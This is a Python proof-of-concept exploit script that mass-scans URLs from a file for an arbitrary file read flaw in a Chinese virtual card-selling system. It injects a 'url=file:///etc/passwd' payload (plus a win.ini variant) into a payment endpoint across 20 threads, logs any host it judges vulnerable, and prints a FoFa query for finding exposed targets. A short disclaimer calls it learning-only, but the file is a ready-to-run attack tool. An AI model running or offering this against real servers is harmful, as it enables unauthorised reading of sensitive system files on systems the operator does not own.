#!/usr/bin/env python3
import requests
from termcolor import colored
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor, as_completed ,CancelledError
import os
import signal
import sys
print('''
本程式僅用於交流學習使用,任何未經授權的滲透測試都是違法行為
/| __ __ ___ __.....__
|| | |/ `.' `. _ _ .-'' '.
|| | .-. .-. ' /\ \\ /// .-''"'-. `.
|| __ __ | | | | | | `\\ //\\ /// /________\ \
||/'__ '. .:--.'. | | | | | | _ _\`// \'/ | |
|:/` '. '/ | \ || | | | | | | ' / |\| |/ \ .-------------'
|| | |`" __ | || | | | | |.' | .' | ' \ '-.____...---.
||\ / ' .'.''| ||__| |__| |__|/ | / | `. .'
|/\'..' / / / | |_ | `'. | `''-...... -'
' `'-'` \ \._,\ '/ ' .'| '/
`--' `" `-' `--' https://github.com/bamuwe
''')
print("漏洞名稱:鯨髮卡系統虛擬卡系統任意檔案讀取漏洞\n")
for filename in ['urls.txt', 'result.txt']:
if not os.path.exists(filename):
with open(filename, 'w') as f:
print(f"[*] Created successfully {filename}")
print(r'[!] Usage : echo \'http://example.com\' > urls.txt && python3 poc.py')
print('[!] FoFa = "/static/theme/maowang51/css/style.css" && status_code="200" && country="CN"')
print()
if not os.path.exists('urls.txt'):
print('urls.txt is empty')
exit(0)
should_stop = False
def signal_handler(sig, frame):
global should_stop
should_stop = True
print("\nInterrupt signal received and trying to stop the program...")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# 處理每個目標URL的函式
def process_target(target):
try:
response = requests.get(target)
if response.status_code == 200 and ('root' in response.text or 'for' in response.text):
return target
except requests.RequestException as e:
pass
def main():
global SuccessCount
SuccessCount = 1
with open('urls.txt') as fi:
targets = [line.strip() + '/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa' for line in fi]
targets_windows = [line.strip() + '/pay/xinhui/request_post?url=file:///C:/windows/win.ini&post_data[1]=aaa' for line in fi]
pbar = tqdm(total=len(targets + targets_windows), desc='process')
with ThreadPoolExecutor(max_workers=20) as executor:
futures = []
for target in targets + targets_windows:
future = executor.submit(process_target, target)
future.add_done_callback(lambda p: pbar.update())
futures.append(future)
for future in as_completed(futures):
if should_stop:
try:
future.cancel()
except CancelledError:
pass
continue
result = future.result()
if result:
pbar.write(colored(f"{SuccessCount}. {result} Vulnerable", 'green'))
with open('result.txt', 'a') as f:
f.write(result + '\n')
SuccessCount += 1
pbar.close()
print(colored(f"All targets have been processed {SuccessCount-1} vulnerable targets found", 'cyan'))
if __name__ == '__main__':
main()